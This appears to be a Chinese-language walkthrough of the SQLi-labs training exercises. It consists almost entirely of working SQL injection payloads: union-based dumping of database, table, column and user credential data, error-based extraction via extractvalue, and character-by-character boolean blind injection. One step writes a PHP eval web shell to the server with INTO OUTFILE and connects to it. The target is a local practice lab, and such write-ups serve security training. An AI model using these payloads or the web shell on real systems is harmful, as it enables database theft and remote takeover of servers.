less-1:单引号注入
?id=1 正常返回
?id=1" 正常返回
?id=1' 返回错误
考虑可能是单引号注入,拼接sql语句
爆数据路个数: ?id=1' order by 4 --+ 错误 ?id=1' order by 3 --+正常 猜测有三个数据库
一、正常流程爆破
爆库名:?id=1' union select 1,2,3 --+
?id=-1' union select 1,user(),database() --+ 用户:root@localhost 数据库名:security
爆表名:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 表名:emails,referers,uagents,users
爆列名:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+ 列名:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
爆数据项:?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
username:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
二、文件读写
尝试可否读文件:?id=-1' union select 1,load_file('E:\\xxx\\WWW\\xxx\\readme.txt'),3 --+
尝试可否写入一句话木马:?id=-1' union select 1,"<?php @eval($_POST['x']);?>",3 into outfile 'E:\\xxx\\WWW\\shell.php' --+ 成功 蚁剑链接 成功
三、盲注、报错
回显报错:(less-2)
?id=1 and(select extractvalue(1,concat('~',(select database())))) XPATH syntax error: '~security'
?id=1 and(select extractvalue(1,concat(0x7e,@@version))) XPATH syntax error: '~5.7.26'
?id=1 and (select extractvalue(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) XPATH syntax error: ',referers,uagents,users'
http://?id=1 and (select extractvalue(1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema ='security' limit 0,1))) XPATH syntax error: ',username,password'
?id=1 and (select extractvalue(1,concat(0x7e,(select group_concat(username) from users limit 0,1)))) XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'
?id=1 and (select extractvalue(1,concat(0x7e,(select group_concat(password) from users limit 0,1)))) XPATH syntax error: '~Dumb,I-kill-you,p@ssword,crappy'
延时注入:(less-2)
布尔盲注: (less-8)
1.获取数据库位数:
http://localhost/sqlilabs/Less-8/?id=1' and length(database())>10 --+ 错误
http://localhost/sqlilabs/Less-8/?id=1' and length(database())<10 --+ 正确
http://localhost/sqlilabs/Less-8/?id=1' and length(database())<9 --+ 正确
http://localhost/sqlilabs/Less-8/?id=1' and length(database())<8 --+ 错误,所以数据库位数为8
2.获取数据库名称:
http://localhost/sqlilabs/Less-8/?id=1' and left(database(),1)='s' --+ 数据库第一位's'
http://localhost/sqlilabs/Less-8/?id=1' and left(database(),2)='se' --+ 多次遍历可得到数据库名称'security'
3.判断数据库中的表的数量:
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 --+ 正确
4.判断表名长度:
?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6 --+ 正确,说明第一个表长6位
?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=8 --+ 正确,同理四个表长分别为:6、8、7、5
5.判断表名:
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>65 --+ ture
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<90 --+ false
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<110 --+ ture,最终可以得出
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+ 说明第一张表的第一位字母ascii为101,即'e'
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+ 第一张表的第二位字母为'm',最终将得出'emails'
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114 --+ 可得出第二章表的第一个字母为:'r',最终可得到所有表名
6.判断表中列数量:
?id=1' and (select count(column_name) from information_schema.columns where table_name='emails')=2 --+
7.判断列名长度:
?id=1' and length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2 --+ 第一列名长2位
?id=1' and length((select column_name from information_schema.columns where table_name='emails' limit 1,1))=8 --+ 第二列名长8位
8.判断列名
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1))=101 --+ 猜出第二列名第一个字母是'e',最终得出'email_id'
9.判断数据长度
?id=1' and length((select email_id from security.emails limit 0,1))=16 --+
10.猜数据
?id=1' and ascii(substr((select email_id from security.emails limit 0,1),1,1)) =68 --+